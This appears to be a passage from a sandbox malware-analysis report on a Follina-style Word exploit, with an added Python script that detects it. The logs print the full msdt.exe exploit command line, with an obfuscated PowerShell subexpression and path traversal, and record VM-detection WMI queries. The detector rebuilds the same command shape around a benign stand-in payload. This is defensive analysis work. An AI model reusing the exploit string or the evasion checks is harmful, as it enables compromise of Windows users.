            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.dll
            Source: C:\Windows\SysWOW64\msdt.exe | File created: C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\DiagPackage.dll
            Source: C:\Windows\SysWOW64\msdt.exe | File created: C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\en-US\DiagPackage.dll.mui
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from win32_PhysicalMemory (2 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterConfiguration (2 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3768 Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 1280
            Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 944
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4486
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2854
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_processor
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_computersystem
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: ram.txt.25.dr Binary or memory string: Manufacturer : VMware Virtual RAM
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe (2 occurrences)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7B.tmp" "c:\Users\user\AppData\Local\Temp\qghxibcc\CSC6B59943BD49B40F0B0C17D73652F0B2.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC028.tmp" "c:\Users\user\AppData\Local\Temp\53i2jeo5\CSCF157ADCDF084F15A343B1EBC149E5EE.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /all
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES753.tmp" "c:\Users\user\AppData\Local\Temp\05d3mwhu\CSC34F94DCCCDC94BCAA3A860A33C1ABBE2.TMP"
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation (2 occurrences)
            Source: C:\Windows\SysWOW64\msdt.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation (3 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation (3 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (6 occurrences)
            Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
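            The signature lines above contain the three observations a detection engineer would turn into rules for this sample: WINWORD.EXE launching msdt.exe with an ms-msdt: URI whose IT_BrowseForFile parameter carries a PowerShell $( ) subexpression and a ../ chain that still resolves to a real file (mpsigstub.exe), PowerShell issuing VM-fingerprinting WMI queries (Win32_PhysicalMemory, Win32_BIOS, Win32_ComputerSystem and similar), and csc.exe/cvtres.exe building throw-away DLLs under %TEMP% (the footprint of Add-Type). The Python below is an added example that runs that logic over constructed events; it is not part of the Joe Sandbox report. The Event schema, the parent image names and the Base64 second stage are assumptions: the report's real blob is redacted, so a benign UTF-16LE string is spliced into an otherwise report-shaped msdt command line.

```python
import base64
import re
from dataclasses import dataclass
from typing import List


@dataclass
class Event:
    """Hypothetical flattened telemetry record (constructed for this example)."""
    kind: str     # "process" = process creation, "wmi" = IWbemServices::ExecQuery
    parent: str   # parent image name (constructed; the report's graph omits some parents)
    image: str    # image name of the acting process
    payload: str  # command line for "process", WQL text for "wmi"


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# WMI classes the report shows PowerShell querying; routinely used to fingerprint VMs/sandboxes.
VM_FINGERPRINT_CLASSES = {
    "win32_physicalmemory", "win32_bios", "win32_baseboard", "win32_computersystem",
    "win32_processor", "win32_logicaldisk", "win32_networkadapterconfiguration",
}
WQL_FROM = re.compile(r"\bfrom\s+([A-Za-z0-9_]+)", re.IGNORECASE)
# A single-quoted Base64 run; the sample wraps the blob in [char]34 quotes inside a '...' literal.
QUOTED_B64 = re.compile(r"'([A-Za-z0-9+/]{16,}={0,2})'")


def msdt_indicators(cmdline: str) -> List[str]:
    """Return the Follina-style indicators present in an msdt.exe command line."""
    hits: List[str] = []
    low = cmdline.lower()
    if "ms-msdt:" not in low:  # ordinary troubleshooter launches use -id/-path, not the URI scheme
        return hits
    hits.append("ms-msdt scheme")
    if "pcwdiagnostic" in low:
        hits.append("PCWDiagnostic troubleshooter")
    m = re.search(r"IT_BrowseForFile=(\S+)", cmdline)
    if m:
        value = m.group(1)
        if "$(" in value:
            hits.append("PowerShell subexpression in IT_BrowseForFile")
        if value.count("/../") >= 3:
            hits.append("path traversal in IT_BrowseForFile")
        if "[char]58" in value:  # '::' assembled from [char] casts to defeat naive string matching
            hits.append("obfuscated static member access")
    if "invoke-expression" in low or re.search(r"\biex\b", low):
        hits.append("Invoke-Expression")
    if "frombase64string" in low:
        hits.append("Base64 stage")
    return hits


def decode_base64_stage(cmdline: str) -> str:
    """Decode the first quoted Base64 blob as UTF-16LE, matching the sample's
    [System.Text.Encoding]::Unicode.GetString call. Returns '' if absent or undecodable."""
    m = QUOTED_B64.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def wmi_indicator(wql: str) -> str:
    m = WQL_FROM.search(wql)
    if m and m.group(1).lower() in VM_FINGERPRINT_CLASSES:
        return "VM-fingerprint WMI class " + m.group(1)
    return ""


def is_compile_after_delivery(ev: Event) -> bool:
    """csc.exe/cvtres.exe working out of %TEMP% is the footprint of PowerShell Add-Type."""
    return (ev.kind == "process" and ev.image.lower() in {"csc.exe", "cvtres.exe"}
            and "\\appdata\\local\\temp\\" in ev.payload.lower())


def analyse(events: List[Event]) -> dict:
    f = {"office_spawned_msdt": False, "msdt_indicators": [], "decoded_stage": "",
         "vm_fingerprint_queries": [], "compile_after_delivery": 0, "verdict": "clean"}
    for ev in events:
        if ev.kind == "process" and ev.image.lower() == "msdt.exe":
            ind = msdt_indicators(ev.payload)
            if ind and ev.parent.lower() in OFFICE_APPS:
                f["office_spawned_msdt"] = True
            f["msdt_indicators"] += ind
            f["decoded_stage"] = f["decoded_stage"] or decode_base64_stage(ev.payload)
        elif ev.kind == "wmi" and ev.image.lower() == "powershell.exe":
            ind = wmi_indicator(ev.payload)
            if ind:
                f["vm_fingerprint_queries"].append(ind)
        if is_compile_after_delivery(ev):
            f["compile_after_delivery"] += 1
    if f["office_spawned_msdt"] and "PowerShell subexpression in IT_BrowseForFile" in f["msdt_indicators"]:
        f["verdict"] = "follina"
    elif f["msdt_indicators"]:
        f["verdict"] = "suspicious"
    return f


# Constructed second stage: the report's real Base64 blob is redacted, so a benign one stands in.
STAGE = "Write-Output 'constructed stage two'"
BLOB = base64.b64encode(STAGE.encode("utf-16-le")).decode("ascii")
# Shape copied from the report's WINWORD.EXE -> msdt.exe "Process created" line, with BLOB spliced in.
MSDT_CMD = (
    "C:\\Windows\\system32\\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "
    '"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu '
    "IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'"
    "+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+"
    "'FromBase64String('+[char]34+'" + BLOB + "'+[char]34+'))'))))"
    'i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"'
)
SAMPLE_EVENTS = [  # constructed; parents for the WMI rows are an assumption
    Event("process", "WINWORD.EXE", "msdt.exe", MSDT_CMD),
    Event("wmi", "sdiagnhost.exe", "powershell.exe", "select * from win32_PhysicalMemory"),
    Event("wmi", "sdiagnhost.exe", "powershell.exe", "select * from Win32_BIOS"),
    Event("wmi", "sdiagnhost.exe", "powershell.exe", "select * from win32_computersystem"),
    Event("process", "csc.exe", "cvtres.exe",
          'cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\\Users\\user\\AppData\\Local\\Temp\\RESAD7B.tmp"'),
    Event("process", "explorer.exe", "msdt.exe", "msdt.exe -id NetworkDiagnosticsWeb"),  # benign launch
]

if __name__ == "__main__":
    print(analyse(SAMPLE_EVENTS))
```

The verdict deliberately requires both the Office parent and the $( ) subexpression: msdt.exe itself is a legitimate binary, and the ../ chain is what lets the IT_BrowseForFile path check pass while the subexpression is evaluated, so either half alone should only raise "suspicious". The decoded stage is returned rather than executed; on real telemetry it would be handed to the PowerShell analysis pipeline.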
            MITRE ATT&CK matrix (techniques listed per tactic; a digit string before a technique is the report's signature-count badge, reproduced as rendered)

            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 521 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 13 Exploitation for Client Execution; 1 PowerShell; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
